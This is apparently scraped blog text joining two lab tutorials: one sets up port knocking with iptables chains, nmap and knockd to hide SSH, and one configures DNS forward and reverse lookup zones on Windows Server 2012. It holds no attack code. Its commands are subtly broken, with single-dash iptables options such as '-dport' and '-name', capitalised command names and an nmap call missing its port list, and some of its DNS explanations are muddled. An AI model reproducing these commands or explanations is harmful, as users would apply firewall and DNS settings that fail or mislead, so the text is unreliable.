Port knocking is a technique use for sending of information through closed ports on a connected computer in a network behind a firewall. It will add security in your network for establishing connection with a particular port until the correct sequence of port is not knocked. The network administer configure port knocking using iptable which act like firewall.

Iptable chain allows a client who is familiar with the secret knock to enter the network through a specific port by performing a sequence of connection attempts. 

The main reason of port knocking is to avoid an attacker from scanning a system for potentially vulnerable services by performing a port scan, because if the attacker will not sends the accurate knock sequence, the protected ports will appear closed.

Port knocking with Iptables

Iptables is a command-line firewall service in Linux kernel that uses rule chains to permit or obstruct traffic. It defined various tables that contain a number of integrated chains which may be containing user-defined chains also. Iptable chain is a list of policy that is used to match a set of packets. Every rule/policy specifies the function that should be done with packets that matches

Type given below command with the help of following option which will create a new iptable chain:

-F: --flush [chain]

Flush the selected chain (all the chains in the table if none is given). This is equivalent to deleting all the rules one by one.

-X: delete-chain [chain]

Delete the optional user-defined chain specified. There must be no references to the chain. If there are, you must delete or replace the referring rules before the chain can be deleted. The chain must be empty, i.e. not contain any rules. If no argument is given, it will attempt to delete every non-builtin chain in the table.

-Z: --zero [chain [rulenum]]

Zero the packet and byte counters in all chains, or only the given chain, or only the given rule in a chain. It is legal to specify the -L, --list (list) option as well, to see the counters immediately before they are cleared. 

-N: --new-chain chain

Create a new user-defined chain by the given name. There must be no target of that name already.

-A: --append chain rule-specification

Append one or more rules to the end of the selected chain. When the source and/or destination names resolve to more than one address, a rule will be added for each possible address combination.

-p: --protocol protocol

The protocol of the rule or the packet to check. The specified protocol can be one of tcp, udp, udplite, icmp, esp, ah, sctp or the special keyword "all", or it can be a numeric value, representing one of these protocols or a different one. A protocol name from /etc/protocols is also allowed. A "!" argument before the protocol inverts the test. The number zero is equivalent to all. All will match with all protocols and is taken as default when this option is omitted.

-m: --match match

Specifies a match to use, that is, an extension module that tests for a specific property. The set of matches make up the condition under which a target is invoked. Matches are evaluated first to last as specified on the command line and work in short-circuit fashion, i.e. if one extension yields false, evaluation will stop.

-j: --jump target

This specifies the target of the rule; i.e., what to do if the packet matches it. The target can be a user-defined chain (other than the one this rule is in), one of the special built-in targets which decide the fate of the packet immediately, or an extension. For example ACCEPT DROP and REJECT.

From ipset.netfilter.org

Iptables -F

Iptables -X

Iptables -Z

Iptables -N STATE0

Iptables -A STATE0 -p tcp -dport 1200 -m recent -name KNOCK1 -set -j DROP

Iptables -A STATE0 -j DROP

Iptables -N STATE1

Iptables -A STATE1 -m recent -name KNOCK1 -remove

Iptables -A STATE1 -p tcp -dport 1300 -m recent -name KNOCK2 -set -j DROP

Iptables -A STATE1 -j STATE0

Iptables -N STATE2

Iptables -A STATE2 -m recent -name KNOCK2 -remove

Iptables -A STATE2 -p tcp -dport 1400 -m recent -name KNOCK3 -set -j DROP

Iptables -A STATE2 -j STATE0

Iptables -N STATE3

Iptables -A STATE3 -m recent -name KNOCK3 -remove

Iptables -A STATE3 -p tcp -dport 22 -j ACCEPT

Iptables -A STATE3 -j STATE0

Iptables -A INPUT -m state - state ESTABLISHED,RELATED -j ACCEPT

Iptables -A INPUT -s 127.0.0.1/8 -j ACCEPT

Iptables -A INPUT -p icmp -j ACCEPT

Iptables -A INPUT -p tcp -dport 80 -j ACCEPT

Iptables -A INPUT -m recent -name KNOCK3 -rcheck -j STATE3

Iptables -A INPUT -m recent -name KNOCK2 -rcheck -j STATE2

Iptables -A INPUT -m recent -name KNOCK1 -rcheck -j STATE1

Iptables -A INPUT -j STATE0

Let’s verify it through port scanning using NMAP command.

Nmap -ST 192.168.0.25

From given below image you can observe that NMAP found only PORT 80 is open.

Type apt-get install knockd command to install knockd.

Knockd is a port-knock command-line utility. It snoops to all traffic on an Ethernet interface, come across for particular "knock" sequences of port knocks. A client makes these port-hits through sending a TCP or UDP packet to a port on the server.

Now type following command for port knocking

Knock -v 192.168.0.25 1200 1300 1400

From given image you can observe that it will start hitting on a particular port which is actually known as port knocking. Since client is aware of sequence he can make correct knocked sequence for connection attempts.

Again use port scanning with NMAP on same target

Nmap -p 192.168.0.25

Hence you can see the difference between both NMAP’s result as this time we got port 22 open for SSH service.

Now client will use credential for login into SSH server.

Conclusion! Network admin adds the filter with specific port that will wait for correct knock sequence which will then open the port to establish the connection otherwise it will remain closed the port until correct port knocked

Setup DNS Penetration testing Lab in Windows Server 2012

August 2, 2017, 9:54 am

≫ Next: How to Perform Remote Tunneling

≪ Previous: How to Secure Port using Port Knocking

$

0

0

Domain Name System is used for name translation into IP address or you can say that it is used for name resolution.

This name is only for the benefit of the human. It is translated into IP addresses to reach the destination. The translation process of a name is called name resolution.

Name resolution starts from right to left. There is another "." after com but it is hidden. This is called root level domain. Winner request is sent to the root domain for translation it forwards this request to com domain which is called Top Level Domain. Com passes the request to yahoo domain which is called 2^ndlevel domain .Yahoo then sends the request to www which is called host name.

Structure of the DNS is distributed over the internet. It means that the name resolution task is not assigned to only computer rather it is distributed over the internet.

Steps to Install DNS server

Configure Static IP setting of your server; here we had assigned 192.168.1.104IP to our machine moreover we had assign server IP also as preferred DNS server.

We have to open Server Manager and then click on Add Roles and Features in order to install role services and features. A new window will come up on screen. Now click on next as shown below in given image.

Select installation type “role based or feature based installation” which is also select as default option and then click on next for further step.

Select the desire server from server pool for configuration of DNS server. From given below image you can observe that  from inside pool 1 computer is found with IP 192.168.1.104 that has been selected as server, now click on next.

Select DNS servercheckbox as role to install it on selected server and click on Next.

Now Just Click on Nextafter reading brief description of DNS.

To install selected role and feature on selected server click on install.

DNS server installation process begins which may takes few minute for installation, at last click on close once the installation has been completed.

This is all about DNS installation now in next step we will configure DNS server.

Zone

Database of DNS is called zone or partition of Domain Name Space represented by Domain Name is called Zone. When you click on zone then you will see two zones one is Forward Lookup Zone and Reverse Lookup Zone.

Forward Lookup Zonesends name and get IP address of the computer.

While Reverse Lookup Zone sends IP address of the computer then why we need name of the computer. The answer is that if firewall is installed on the computer then firewall stop or allow traffic on the basis of name that is why reverse lookup zone is used to convert IP address in the name.

Steps to create a Forward Lookup zone:

1)      Select DNS from drop down list server manger, this will open the server on which we have install DNS role.  Select your server (WIN-KSR8OM147HH ) make right click on it  and select DNS from that list.

When we select DNS in server Manager it will open a new window as DNS Manager.

Now we will configure Forward lookup zone as well as Reverse Lookup Zone. So to create Forward Lookup Zone, select Forward Lookup Zones and right click on it and select New Zone from menu box to take up the New Zone Wizard then click on next.

It will show the list of Different types of Zones and storage such as Primary Zone, Secondary Zone & Stub Zone.

Zone Types

Primary Zone:  A primary DNS zone has authority of read / writes for DNS server also known as master server. It stores the master copy of zone data in a local file or in AD DS. 

Secondary Zone:  A Secondary DNS Zone is Read-Only copy of a Primary Zone; this DNS server is a secondary resource for information about this zone.

Active Directory Integrated DNS Zone: It is also writeable zone. To make Active Directory Integrated zone the machine must be a domain Controller. RODC (read only domain controller).feature is only available in server 2008 R2.The domain controller must be writeable not read only because it is more secure. There is a security tab in the AD integrated zone, it is a multi master structured. In case of AD integrated zone, DNS database will be replicated as a part of domain replication.

Stub zone: It is nature secondary. It has no database of its own. Its load the database from master DNS. It only takes selective records not the complete database. Three records NS, SOA and Glue A will transfer into stub zone. Stub is read only.

DNS uses port 53 for communication and it uses both TCP and UDP protocols. Dynamic DNS (DDNS) is used to automatically update IP addresses in DNS when changed by DHCP. You will enable DDNS option in the zone properties to secure only.

Select primary zoneand click on next.

Give desired Zone name like raj and click on next.

Save this into a new zone file as raj.dns and click on next.

Select Do not allow dynamic updates option, if you want to update these records manually .Click on next then Finish.

Now we had completed the configuration for Forward Lookup Zone; next we will configure reverse lookup zone.

Reverse Lookup Zone:

Domain Name system (DNS) servers can enable clients to determine the DNS name of a host based on the host's IP address by providing a special zone called a reverse lookup zone. A reverse lookup zone contains pointer (PTR) resource records that map IP addresses to the host name. Some applications, such as secure web applications, rely on reverse lookups.

A reverse lookup takes the form of a question, such as "can you tell me the DNS name of the computer that uses the IP address 192.168.1.120?"

A special domain, the in-addr.arpa  domain, was defined in the DNS standards and reserved in the internet DNS namespace to provide a practical and reliable way to perform reverse queries . In reverse lookup zone the address is written in reverse order.

Step to create a Reverse Lookup Zone:

To create Reverse Lookup Zone,make right click on it and click on New Zone from the inside the menu box to take up the New Zone Wizard.

Select primary zoneand click on next.

Click on first radio button for IPv4 reverse Lookup Zone to translate IP address into DNS name then click on next.

Type Network ID field as 192.168.1 which is the first three octets of IP-address of our DNS Server then click on next.

Save this in a new zone file and select first radio button for this step then click on next.

Select Do not allow dynamic updates option, if you want to update these record manually. Click on next.

We have successfully completed configuration for new zone of reverse Lookup. Now just click on finish.

Now you can observe that on the right side of DNS Manager Window, Reverse Lookup Zone is now created that contains two records i.e. SOA and NS in it.

1)      Now we are going to create a new pointer in our new zone file i.e. 1.168.192.in-addr.arpa, as shown in given below image

Here we require host name in order to create new resource record, click on browse to select the record.

Resource Records

Resource records are the DNS database entries to answer DNS client queries. Name, type and data. The client query is always shown under the name title; DNS server answer always shown under the data title, in type different types of records is shown. Common recorded in DNS are A (Name to IP), PTR (reverse of A), SRV, MX, MS, SOA, etc.

Select 2^ndfile i.e. name server (NS) record as shown in given below image and click on OK.

DNS Queries

There are two types of queries in DNS:

·         Recursive Query: - It goes from DNS client to DNS server. It answer is complete means processing is complete.

·         Iterative Query: - It goes from DNS server to DNS server. It answer is not complete means its reply is referral. Iterative query is used to reach from one DNS to another DNS. It keeps the reply for 60minutes in his cache.

Verify DNS configuration

Open command prompt and type following command which will search for the Domain Name System (DNS) to find domain name or IP address mapping.

Nslookup 192.168.1.104 (server’s ip)

From given below image you can read the name of NS record/domain name i.e. raj.

Similarly using command nslookup raj wefound host IP i.e. 192.168.1.104